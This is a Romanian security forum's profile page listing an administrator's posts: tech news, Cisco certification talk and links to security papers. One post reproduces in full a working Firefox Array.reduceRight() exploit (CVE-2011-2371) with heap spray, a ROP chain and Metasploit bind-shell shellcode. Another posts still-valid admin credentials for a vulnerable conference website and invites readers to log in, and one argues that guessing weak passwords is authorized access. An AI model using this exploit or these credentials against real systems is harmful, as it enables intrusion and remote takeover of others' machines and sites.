Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Nytro

    HTML5 CSS3 teste

    Hands On: Windows 8 HTML5 Platform Teste cu diverse "jucarii" CSS3: animatii, transparenta, gradient, transformari 3D, multe lucruri interesante de testat, cu codul afisat alaturi. http://ie.microsoft.com/testdrive/Graphics/hands-on-css3/
  2. Nytro

    Fmi

    Sunt eu, anul II, dar nu prea dau pe la facultate.
  3. E important?
  4. VIDEO: Android Ice Cream Sandwich va fi lansat la 19 octombrie de Radu Eftimie | 14 octombrie 2011 Samsung si Google au anuntat oficial ca lansarea Ice Cream Sandwich va avea loc in data de 19 octombrie, adica peste mai putin de o saptamana. Zvonurile privind data lansarii Android ICS (Ice Cream Sandwich) si a telefonului Nexus Prime de la Samsung au fost confirmate chiar de catre cele doua companii care au trimis deja invitatii pentru evenimentul din 19 octombrie. Si - apropo de invitatii - se pare ca Google a imprumutat din practica Apple de a trimite o invitatie cu skepsis si de a mentine misterul asupra ceea ce urmeaza sa se intample la eveniment. Invitatia nu face referire la lansarea ICS decat printr-o imagine a mascotei noului sistem de operare. Lansarea Android va fi transmisa prin live streaming pe canalul YouTube al sistemului de operare. Ieri, Google a montat in campusul companiei, ce-a de-a cincea mascota Android, cea a Ice Cream Sandwich. Lansarea Android 4 si a telefonului Nexus Prime, stabilita initial pentru 11 octombrie, a fost amanata de Google si Samsung imediat dupa moartea lui Steve Jobs. Sursa si video: VIDEO: Android Ice Cream Sandwich va fi lansat la 19 octombrie | Hit.ro
  5. Canonical a lansat Ubuntu 11.10 Oneiric Ocelot de Radu Eftimie | 14 octombrie 2011 Canonical a anuntat, ieri, lansarea unei noi versiuni a celui mai popular sistem de operare open source, Ubuntu 11.10. Desi nu aduce schimbari mari din punct de vedere grafic fata de versiunea anterioara (Ubuntu 1.04 si derivatele sale), noua distributie pare a imbunatatita. Ubuntu 11.10 vine cu o versiune imbunatatita a interfetei sale grafice, Unity, (prezentata in premiera in varianta precedenta a sistemului de operare). Desi este prea devreme pentru a putea puncta in mod obiectiv evolutia noului Ubuntu, se pare ca acesta versiune a obtinut in teste rezultate mai bune in raport cu Ubuntu 11.04. De amintit este ca utilizatorii curiosi sa testeze noua distributie Ubuntu au la dispozitie programul Wubi care le permite sa instaleze sistemul de operare al Canonical direct in Windows, fara sa pericliteze in vreun fel integritatea partitiilor de pe hard disk. Ubuntu 11.10 vine insotit, ca si celelalte variante anterioare, de mai multe programe utile, precum o suita office open source, browserul Firefox sau Chrome, Skype si alte pachete. Sursa: Canonical a lansat Ubuntu 11.10 Oneiric Ocelot | Hit.ro
  6. Probabil a ghicit parolele. Iar accesul folosind un nume de utilizator si o parola NU E NEAUTORIZAT. E autorizat tocmai prin acea parola simpla, pentru care de vina e posesorul ratat. Deci, inca o data, muie autoritatilor.
  7. Prezentari "Forumul securitatii IT" Detalii aici: http://rstcenter.com/forum/41142-cica-forumul-securitatii-pe-11-octombrie.rst Prezentarile sunt descarcate de pe site. 13-Oct-11 12:53 PM 1,080,510 Adrian Furtuna.pdf 13-Oct-11 12:53 PM 3,130,880 Alexandru Catalin COSOI.ppt 13-Oct-11 12:53 PM 4,633,088 Alexandru Negrea.ppt 13-Oct-11 12:53 PM 12,342,784 Bogdan Toporan.ppt 13-Oct-11 12:53 PM 10,486,234 Costin Pecingina.pptm 13-Oct-11 12:53 PM 8,118,784 Doru Manea.ppt 13-Oct-11 12:53 PM 1,335,798 Fermin Catalan Ramos.pptx 13-Oct-11 12:53 PM 499,079 Gabriel Mihai Tanase.pdf 13-Oct-11 12:53 PM 2,410,811 Gidon Pely.pptx 13-Oct-11 12:53 PM 1,119,846 Kemal Ozmen.pdf 13-Oct-11 12:54 PM 3,389,718 Radu Herinean.pptx 13-Oct-11 12:54 PM 1,566,720 Razvan Grigorescu.ppt 13-Oct-11 12:54 PM 418,304 Tofan Dan.ppt 13 File(s) 50,532,556 bytes Download: http://www.fileshare.ro/30982997771 http://www.girlshare.ro/2738230 http://www30.zippyshare.com/v/60113036/file.html Site-ul este inca vulnerabil, nu au facut decat sa stearga toti utilizatorii, cu exceptia: User: admin Parola: admin Care este un cont normal, si: User: conferinte Parola: Fara parola, lasati necompletat Logare: Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMedia Cu care puteti intra in panoul de administrare. Se pare ca azi au sters si pagina de administrare: The requested URL /conferences/admin.php was not found on this server. Legat de ce a fost acolo, nu cred ca are rost sa comentez. Pare-mi-se ca firmele de antivirus isi lauda produsele, si se tot compara intre ele , cei care au firme de securitate tot prezinta niste rahaturi pur teoretice si inutile si tot asa. Ei spun ca stiu cum actioneaza "hackerii" (termen folosit de ei cu sens de "criminal cibernetic"), ei identificandu-se ca fiind un fel de "politie virtuala", ca fiind baieti buni. Pretind ca stiu cum se actioneaza, dar pana la urma... "Nu pune un politist sa faca treaba unui hot".
  8. Cel mai usor laptop din lume e unul romanesc! De la Evolio de Radu Eftimie | 12 octombrie 2011 Are doar 980 de grame, ceea ce il face mai usor decat MacBook Air cu o suta de grame. Se numeste U9, dar, mai presus de toate, este produs de compania romanesca Evolio si este cel mai usor ultrabook din lume. Oficial: Evolio lanseaza U9, cel mai usor notebook din lume Potrivit producatorului Evolio, laptopul care bate Macbook Air-ul la portabilitate va ajunge pe piata in luna decembrie. Evolio U9 dispune de un procesor Intel Atom Dual-Core (1,6 GHz), are 2GB RAM (DDR3) si un spatiu de stocare de 128GB (SSD). Ecranul laptopului Evolio masoara 29,5 cm si are o rezolutie de 1366x768 pixeli. Laptopul este echipat cu tehnologia de accelerare grafica "PowerVR Core", ce permite rularea tuturor formatelor video Full HD: (BlueRay, Mpeg2, Mpeg4, WMv9, H.264) si proiectarea acestora pe un televizor sau display extern prin intermediul interfetei HDMI. Portabilul mai este dotat cu o camera video de 1,3 MP. Noul laptop romanesc ce vrea sa detroneze MacBook Air-ul Apple, va costa 450 de euro (TVA inclus) si va ajunge in magazine in apropierea sarbatorilor de iarna. Sursa: Cel mai usor laptop din lume e unul romanesc! De la Evolio | Hit.ro
  9. RIP Dennis Ritchie, 1941-2011: Computer scientist, Unix co-creator, C programming lan By Xeni Jardin at 7:19 pm Wednesday, Oct 12 Computer scientist Dennis Ritchie is reported to have died at his home this past weekend, after a long battle against an unspecified illness. No further details are available at the time of this blog post. Wikipedia biography here. He was the designer and original developer of the C programming language, and a central figure in the development of Unix. He spent much of his career at Bell Labs. He was awarded the Turing Award in 1983, and the National Medal of Technology in 1999. "Ritchie's influence rivals Jobs's; it's just less visible," James Grimmelman observed on Twitter. "His pointer has been cast to void *; his process has terminated with exit code 0." The news of Ritchie's death was first made public by way of Rob Pike's Google+. Photo, below: Candlelight vigil for Dennis M. Ritchie. (thanks, Kevin) Wiki: http://en.wikipedia.org/wiki/Dennis_Ritchie Sursa: http://boingboing.net/2011/10/12/dennis-ritchie-1941-2011-computer-scientist-unix-co-creator-c-co-inventor.html Pfffffff, dupa parerea mea, un om mult mai important in IT decat Steve Jobs.
  10. Mozilla Firefox Array.reduceRight() Integer Overflow Exploit # Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit # Date: 12 Oct 2011 # Author: Matteo Memelli ryujin -AT- offensive-security.com # CVE-2011-2371 # Full exploit package: http://www.exploit-db.com/sploits/17974.zip <html> <head> <title>ff-i-<3-u</title> </head> <body> <center> <br /> Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br /> Date: 12 Oct 2011<br /> Author: Matteo Memelli ryujin -AT- offensive-security.com<br /> CVE-2011-2371<br /> Full exploit package: <br /> http://www.exploit-db.com/sploits/17974.zip <br /> <br /> Thx to dookie for helping <br/> Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br /> http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/> DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/> Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/> <APPLET id="MyApplet" code="ph33r.class" width=150 height=50> You need a Java-enabled browser to pwn this. </APPLET> </center> <script type="text/javascript"> var applet = document.getElementById('MyApplet'); function spray() { // fake object pointers var ptrs = unescape("%u4141" + // padding // MOV EDX,DWORD[ESI] 0c000048=0c00007c "%u0048%u0c00" + "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141" + // padding // PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3] // RETN 1C75 "%u0EEF%u7C37" + "%u4141%u4141" + // padding "%u4141" + // padding "%u240c%u3410" + // 3410240c RETN after PIVOT "%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u002e%u0c00"); // 0c00007c -> 0c00002e // CALL PIVOT 0x7C370EEF var bheader = 0x12/2; // u.n.d.e.f.i.n.e.d. string // beginning of each array element var nullt = 0x2/2; // string null terminator // 0:000> ? 0c001cbe - 0c000012 // Evaluate expression: 7340 = 00001cac var espoffset = (7340 /2) - ptrs.length; var esppadding = unescape("%u0c0c%u0c0c"); while(esppadding.length < espoffset) {esppadding += esppadding;} esppadding = esppadding.substring(0, espoffset); // sayonara rop chain rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u0c0c%u0c0c"); // NOP / MOV ESP,0x0c0c0c0c // windows/shell_bind_tcp - 341 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process, // InitialAutoRunScript=, AutoRunScript= var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); rop += shell; var tr_padding = unescape("%u0c0c%u0c0c"); while(tr_padding.length < 0x80000) {tr_padding += tr_padding;} var dummy = ptrs + esppadding + rop + tr_padding; var hspray = dummy.substring(0,0x80000 - bheader - nullt); // Allocation of 64 blocks of 1Mb. HeapBlocks = new Array() for (i=0;i<0x40;i++){ HeapBlocks[i] += hspray; } } spray(); hola = new Array; hola.length = 2197815302; // 0x0c000014 beginning of sprayed block w00t = function ph33r(prev, myobj, indx, array) { alert(myobj[0]); // trigger getProperty } hola.reduceRight(w00t,1,2,3); </script> </body> </html> Download: http://www.exploit-db.com/sploits/17974.zip Sursa: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
  11. Buffer overflow exploitation SEH Khalil Ezhani (caluber) Senator.of.Pirates _a_ gmail.com http://www.facebook.com/SenatorofPirates Chapter 1 Introduction Verify the bug Some of the ways to search for titles Exploit Chapter 2 Definition SEH Build an appropriate investment Practical Example Introduction In software, a stack overflow occurs when too much memry is used on the call stack. The call stack contains a limited amount of memory, often determined at the start of the program. The size of the call stack depends on many factors, including the programming language, machine architecture, multithreading, and amount of available memory. When a program attempts to use more space than is available on the call stack (that is, when it attempts to access memory beyond the call stack's bounds, which is essentially a buffer overflow), the stack is said to overflow, typically resulting in a program crash. This class of software bug is usually caused by one of two types of programming errors. Download: http://www.exploit-db.com/download_pdf/17971
  12. Nytro

    Cisco ccie

    Si eu credeam la fel, am citit azi: "CCNA certifications are valid for three years" Aici: CCNA - Career Certifications & Paths - Cisco Systems PS: Nu am citit tot, am citit "in trecere".
  13. Nytro

    Cisco ccie

    Sunt valabile 3 ani parca. Daca vei lucra in domeniu, da, desigur. Bine, costa bani, dar sunt dovada ca stii ceva, ca asa iti poti umple CV-ul de vorbe in vant...
  14. Evitati pe cat posibil folosirea lor, multe au probleme grave de securitate. http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=
  15. Nytro

    Cisco ccie

    CCIE e greu de luat, am inteles ca trebuie sa mergi intr-o tabara care costa cateva mii de dolari si foarte putini iau examenul. De asemenea trebuie un CV in care sa descrii activitatea ta din ultimii ani si sa dai vreo 2 exemple de probleme rezolvate de tine, probleme complexe legate de networking, solutia aleasa, de ce ai ales acea solutie si tot asa... Ca proba daca imi aduc bine aminte, iti dau o retea nasoala de vreo 20 de dispozitive cu cine stie ce problema, si ai la dispozitie 8 ore parca sa descoperi problema si sa o rezolvi, apoi sa explici cum ai descoperit-o, ce solutie ai ales si de ce. Ar mai fi Cisco Certified Arhitect, dar trebuie sa ai vreo 20 de ani experienta, e cea mai dorita certificare din lume, il au in jur de 15-20 de persoane, majoritatea sau toate probabil sefi la CISCO. Costa o gramada de bani si trebuie sa ai cel putin cateva contributii majore la networking pe plan international. Tot asa, fara examen, trebuie un CV al dracu de smecher si lung si stai de vorba cu cei care au aceasta certificare si ei decid daca o primesti sau nu. Si CCIE e primul pas spre CCA, cam 5% iau CCIE, nu e tocmai pentru incepatori ci poate pentru cei care lucreaza de ani buni in meserii care cer networking la nivel hardcore. PS: Aceste informatii le am de la un curs introductiv CISCO.
  16. E posibil sa fie de 5 ori mai bun decat multe rahaturi mult mai scumpe. Bine, e modul stupid de a gandi: "Cu cat e mai scump cu atat e mai bun"...
  17. Primul smartphone romanesc costa 649 lei de Radu Eftimie | 11 octombrie 2011 A fost lansat pe piata autohtona primului smartphone romanesc, Alldro P1, potrivit producatorului. Terminalul, care costa doar 649 de lei, are instalat sistemul de operare Google Android 2.2 si dispune de doua sloturi pentru cartele sim de telefonie mobila. Smartphone-ul Dual SIM functioneaza cu sistemul de operare Android 2.2, are cu ecran multitouch capacitiv de 3,5 inci, ofera conectivitate la internet prin Wi-Fi, GPRS si EDGE, dar si un sistem de navigatie GPS. Functia de navigare este disponibila prin sistemul GPS integrat si prin aplicatia Google Maps. AllDro P1 are o baterie de 1.500 mah care asigura, potrivit producatorului, un timp de convorbire de 300 minute in timp ce autonomia in standby poate ajunge pana la 200 ore. Primul smartphone romanesc mai dispune de o camera foto de 5 MP care are functie de detectare a fetei, flash si autofocalizare. Important este si ca ambele SIM-uri se pot afla in standby simultan. Sursa: Primul smartphone romanesc costa 649 lei | Hit.ro
  18. Stiu ca e de "Cele mai penale posturi", dar ma intereseaza daca e infectat, si vreau sa vad si cu ce.
  19. Videotutorialul nu arata decat un GUI care nu face nimic, cu niste optiuni pe care nici pe mama nu ar prosti-o. O sa il verific (analizez) cand ajung acasa.
  20. Celelalte versiuni ale porcariei erau toate infectate. Probabil si chestia asta e la fel.
  21. Clientii persoane fizice ai RCS&RDS pot testa noul protocol de conectare la internet - IPv6 de Adrian Vasilache HotNews.ro Luni, 10 octombrie 2011, 11:29 Economie | Telecom Abonatii la internet prin fibra optica, clienti rezidentiali ai RCS & RDS, pot testa noul protocol de conectare la internet, Internet Protocol versiunea 6 (IPv6), pe care compania il are in curs de implementare, a anuntat luni operatorul de comunicatii prin cablu. Protocolul permite printre altele configurarea adresei de internet printr-un mecanism mult simplificat si ofera oricarui utilizator posibilitatea de a seta cu usurinta accesul la internet pentru echipamentele folosite. IPv6 poate fi testat prin inscriere in "Contul Meu Digi" de pe website-ul companiei, orasele care intra in prima etapa a testarii fiind: Bucuresti, Cluj-Napoca, Constanta, Timisoara, Iasi, Sibiu, Craiova, Targu Mures, Galati, Bacau, Braila, Pitesti, Ramnicu-Valcea, Targu-Jiu, Cernavoda, Medgidia, Eforie Nord, Navodari, Murfatlar. IPv6 mareste enorm spatiul de adrese de internet valabil pentru vechiul protocol IPv4, de la 2 la puterea 32 la 2 la puterea 128 si asigura companiei posibilitatea de a multiplica numarul de clienti existenti in retea. Pe langa spatiul mult mai mare pentru adrese, acest protocol mai are si urmatoarele avantaje: gestionare simplificata a adreselor, autoconfigurarea usoara a acestora, rutare optimizata, o mai buna securizare a datelor transmise. IPv6 permite ca orice echipament care se poate conecta la internet (imprimanta, smart phone, tableta, smart TV, home theater PC, frigider, camera de supraveghere, NAS - Network Attached Storage, etc.) sa aiba o adresa publica si nu privata, ca pana acum. Protocolul permite astfel configurarea adresei de internet printr-un mecanism mult simplificat si ofera oricarui utilizator posibilitatea de a seta cu usurinta accesul la internet pentru echipamentele folosite. Una dintre promisiunile IPv6 este ca numarul aproape infinit de adrese si renumerotarea facila vor face ca NAT (Network Address Translation) sa devina inutil. Se vor putea construi astfel noi aplicatii fara solutii greoaie sau erori aleatorii, aparute acum in IPv4 in contextul utilizarii NAT. Din luna noiembrie a acestui an, testarea IPv6 va fi disponibila si pentru clientii business ai RCS & RDS iar pana la sfarsitul anului 2011, compania va extinde programul de testare la nivel national, in intreaga retea. Informatii despre noul protocol si despre modalitatea de testare a acestuia pot fi gasite in Contul meu Digi de pe Personal (https://digicare.rcs-rds.ro) sau la numarul de telefon 031.400.4600. RCS&RDS si-a dezvoltat propria infrastructura de telecomunicatii pe suport de fibra optica si acopera cu servicii de cablu TV, internet, telefonie fixa si mobila peste 200 orase din tara. RCS & RDS este lider pe piata din Romania in furnizarea serviciilor de internet si de televiziune prin cablu si satelit si este cel mai mare furnizor alternativ de servicii de telefonie fixa. Sursa: Clientii persoane fizice ai RCS&RDS pot testa noul protocol de conectare la internet - IPv6 - Telecom - HotNews.ro
  22. Am mai vazut zilele trecute doua documentare despre "hackeri"... Si tot asa, echipe "profesioniste" la cursuri de training invatau despre "traceroute/tracert" si cica vedeau ei milioane de atacuri. Mai ziceau ca la 24 de ore dupa ce un calculator se conecteaza la Internet, gata, e deja atacat. Si asta spunea echipa pentru atacuri internationale bla bla. Rahaturi, pe mine de ce nu ma ataca nimeni niciodata? De fapt, pe cine ataca?
  23. Problema cu unele diacritice, probabil cu cele Unicode, o sa vedem care e problema.
  24. Bypassing ASLR/DEP By Vinay Katoch Vulnerability Research Specialist Data Execution Prevention (DEP) is a security feature included in modern operating systems. It is known to be available in Linux, Mac OS X, and Microsoft Windows operating systems and is intended to prevent an application or service from executing code from a non-executable memory region. Whereas Address space layout randomization (ASLR) is a computer security technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space. In this paper we will cover the techniques to bypass these security mechanisms. We will also look at how custom shellcodes are developed, and this paper also looks at the EMET (Enhanced Mitigation Experience Toolkit) bypass. Download: http://www.exploit-db.com/download_pdf/17914
  25. Wireless Hacking & Wireless Security About Author: Suman Sah is a Electronics and Communication Engineer of PCET(PTU) , Having 1 year experience in the field of Wireless/GSM hacking and security. Wireless networking brings a whole new meaning to networking security risk analysis and mitigation. With readily available equipment, attacks on wireless networks have never been so easy. Network administrators, uncomfortable with the state of wireless LAN security, have turned to more traditional methods to secure their wireless networks. Often, they will use IPSec, which operates on the network layer, to provide the required security. Unfortunately, network layer security solutions such as IPSec do not address all of the security concerns that arise from the shared airwaves. In addition, the "per-tunnel" licensing of commercial IPSec solutions makes the network layer solution somewhat costly, and adds to the management headaches inherent in network layer solutions. Since network layer security is not a complete solution for wireless networks, standards bodies such as the IEEE have focused on 802.11, a protocol that provides security at the link layer. Link layer security can protect a wireless network by denying access to the network itself before a user is successfully authenticated. This prevents attacks against the network infrastructure and protects the network from attacks that rely on having IP connectivity. Wi-Fi Protected Access, a link layer solution, was designed specifically for wireless networks and is particularly well suited for wireless security. This paper examines network layer security provided by IPSec and link layer security provided by WPA, addressing the characteristics of each approach when applied to wireless networks. It focuses on the shortcomings of IPSec when applied to wireless networking security concerns, and it demonstrates how WPA provides a more desirable wireless network security solution for most applications. Download: http://www.exploit-db.com/download_pdf/17916
×
×
  • Create New...